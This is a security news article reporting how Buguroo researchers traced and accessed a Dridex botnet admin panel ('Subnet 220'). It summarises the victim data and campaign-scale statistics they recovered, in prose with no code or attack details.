Buguroo’s security researchers have found one of Dridex’s admin panels, and after leveraging an older vulnerability, they hacked its backend, recovering user’s data.
The researchers’ investigation started in January 2016, when their bugFraud Defense endpoint protection system detected a classic Dridex alert, related to Web injections taking place in the user’s browser, where Dridex’s malware was loading malicious JavaScript on banking websites in order to steal authentication credentials.
After analyzing the alerts deeper, researchers found the IP address of one of the Dridex admin panels hardcoded in the malicious JavaScript files used to hijack the user’s web browser.
Due to the fact that Dridex operations are carried out on a massive scale, the hackers behind this huge botnet use multiple smaller infrastructures, called subnets. This fractured architecture makes it harder to detect Dridex’s operations for security companies, as well as harder to sinkhole the cybergang’s infrastructure.
Buguroo researchers discovered the admin panel of a Dridex section previously known as Subnet 220. Fortunately, the subnet was running an older version of the Dridex backend, in which some weaknesses have been previously discovered.
Thanks to this vulnerability, the security researchers crack opened the Subnet 220’s admin panel and looked inside. By recovering the data found inside this backend, the Buguroo researchers managed to determine the scale at which these hackers operate and discovered new techniques used in some recent attacks.
Apart from uncovering the actual evidence which hackers are behind and the recent Locky ransomware infections, the experts found some victim data which included details such as bank accounts, victim names, last login dates, and card numbers with additional details such as the card’s type, bank and country. Most of this data belonged to banks from English-speaking countries, though victims were from all over the world.
The statistics shows that security researchers found data from more than 100 countries, belonging to over 900 business entities, of which 70% were from English-speaking issuing organizations, and 85% of victims were from non-English-speaking countries.
According to the researchers, Dridex hackers operate in short-burst campaigns, and launch multiple attacks at various intervals. On average, cyber criminals collect 16,000 credit card numbers per campaign, from which they steal around $500 from each victim.
Considering the fact that banks detect and block these illicit transactions in 90% of the cases, the hackers pocket around $800,000 per each campaign.
